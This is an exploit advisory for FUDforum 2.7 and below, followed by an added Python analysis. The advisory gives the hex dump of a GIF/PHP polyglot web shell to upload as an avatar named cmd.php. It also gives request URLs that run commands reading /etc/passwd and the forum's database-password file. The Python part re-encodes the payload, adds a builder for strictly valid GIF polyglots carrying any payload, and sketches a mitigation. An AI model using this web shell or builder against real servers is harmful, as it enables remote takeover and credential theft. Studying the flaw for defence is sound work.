Remote code execution exploit for FUD Forum versions 2.7 and below.
68a63805a860c1ee120af420819c0ab4d12a5942b56e21c9e07b5373a6c5856e
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-identifier">FUDforum <= 2.7 remote (based on http://www.securityfocus.com/bid/14678...)
no need for code:
I create a malformed GIF (to bypass the image format check...)
called cmd.php; this is a hexadecimal dump of the file...
47 49 46 38 39 61 09 00 0C 00 80 00 00 FF 00 00
FF FF FF 21 F9 04 01 3C 3F 70 68 70 20 73 79 73
74 65 6D 28 24 48 54 54 50 5F 47 45 54 5F 56 41
52 53 5B 63 6D 64 5D 29 3B 20 3F 3E 00 00 01 00
2C 00 00 00 00 09 00 0C 00 00 02 14 8C 8F 01 90
B6 9C 1E 3C 72 AA 4A B1 93 88 F7 D5 80 CD 58 00
00 3B
inside you have:
<?php system($HTTP_GET_VARS[cmd]); ?>
You can upload this, then retrieve the image URL from the profile page, usually something
like:
http://[target]/[path]/images/custom_avatars/[something].php
so you call this url in this way:
http://[target]/[path]/images/custom_avatars/[something].php?cmd=[command]%20>%20temp.txt
redirecting the output to a temporary file (otherwise you will see strange characters on screen)...
examples:
http://[target]/[path]/images/custom_avatars/[something].php?cmd=cat%20/etc/passwd%20>%20temp.txt
then view the temp.txt file
or, to see the database password:
http://[target]/[path]/images/custom_avatars/[something].php?cmd=cat%20../../../FUDforum/include/GLOBALS.PHP%20>%20temp.txt
rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it
</span></span>
</code></pre>
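Added example (not rgod's code, nor FUDforum's): the Python below transcribes the hex dump from the advisory, shows that a header-only check of the kind PHP's getimagesize() performs accepts it as a 9x12 GIF, shows that a strict block walk rejects it as malformed, and then generalises the trick by building a structurally valid GIF89a that carries the same kind of payload in a Comment Extension, which a full decoder accepts too. The strict walker, the comment-extension builder and the safe_upload_name() mitigation sketch are this example's own assumptions; only the byte string and the payload it contains come from the page.

```python
"""GIF/PHP polyglot dissection (added example, not the advisory's code)."""
import re
import secrets
import struct

# Transcribed from the advisory's hex dump (98 bytes, uploaded as cmd.php).
RGOD_GIF = bytes.fromhex(
    "47494638396109000C00800000FF0000"
    "FFFFFF21F904013C3F70687020737973"
    "74656D2824485454505F4745545F5641"
    "52535B636D645D293B203F3E00000100"
    "2C0000000009000C000002148C8F0190"
    "B69C1E3C72AA4AB19388F7D580CD5800"
    "003B"
)


def header_check(data):
    """Header-only check, like getimagesize(): signature plus logical screen
    descriptor. Returns (width, height) or None. Never looks past byte 13."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return None
    return struct.unpack("<HH", data[6:10])


def strict_walk(data):
    """Walk every block the way a real decoder would. True only if the file
    is well formed through to the 0x3B trailer."""
    if header_check(data) is None:
        return False

    def skip_subblocks(p):
        while True:
            if p >= len(data):
                raise ValueError("truncated sub-block chain")
            n = data[p]
            p += 1
            if n == 0:
                return p
            p += n

    pos = 13
    if data[10] & 0x80:                       # global colour table present
        pos += 3 * (2 << (data[10] & 0x07))
    try:
        while pos < len(data):
            tag = data[pos]
            pos += 1
            if tag == 0x3B:                   # trailer: clean end of file
                return True
            if tag == 0x21:                   # extension: label + sub-blocks
                pos = skip_subblocks(pos + 1)
            elif tag == 0x2C:                 # image descriptor (9 bytes)
                if pos + 9 > len(data):
                    return False
                ipacked = data[pos + 8]
                pos += 9
                if ipacked & 0x80:            # local colour table
                    pos += 3 * (2 << (ipacked & 0x07))
                pos = skip_subblocks(pos + 1)  # LZW min code size, then data
            else:
                return False
    except ValueError:
        return False
    return False


def find_php(data):
    """Return the first <?php ... ?> block embedded in the bytes, or None."""
    m = re.search(rb"<\?php.*?\?>", data, re.S)
    return m.group(0) if m else None


def build_polyglot(payload):
    """Assumption: a 1x1 GIF89a whose Comment Extension (0x21 0xFE) carries
    the payload in <=255-byte sub-blocks. Unlike the advisory's file, every
    block is well formed, so even a strict decoder accepts it."""
    out = bytearray(b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0))
    out += b"\x00\x00\x00\xff\xff\xff"                  # 2-entry colour table
    out += b"\x21\xfe"
    for i in range(0, len(payload), 255):
        chunk = payload[i:i + 255]
        out += bytes([len(chunk)]) + chunk
    out += b"\x00"                                      # end of comment
    out += b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
    out += b"\x02\x02\x44\x01\x00"                      # minimal LZW data
    out += b"\x3b"
    return bytes(out)


def safe_upload_name(data, client_name):
    """Mitigation sketch (assumption, not FUDforum code): ignore the client's
    filename entirely and derive the extension from the verified content.
    The avatar directory must also be served without script execution."""
    if header_check(data) is None:
        raise ValueError("not a GIF: %r rejected" % client_name)
    return secrets.token_hex(16) + ".gif"
```

Note that validating structure does not help on its own: the comment-extension variant passes strict_walk() and still carries the payload. What actually closed this hole is refusing the client-supplied .php name and serving the avatar directory as static content.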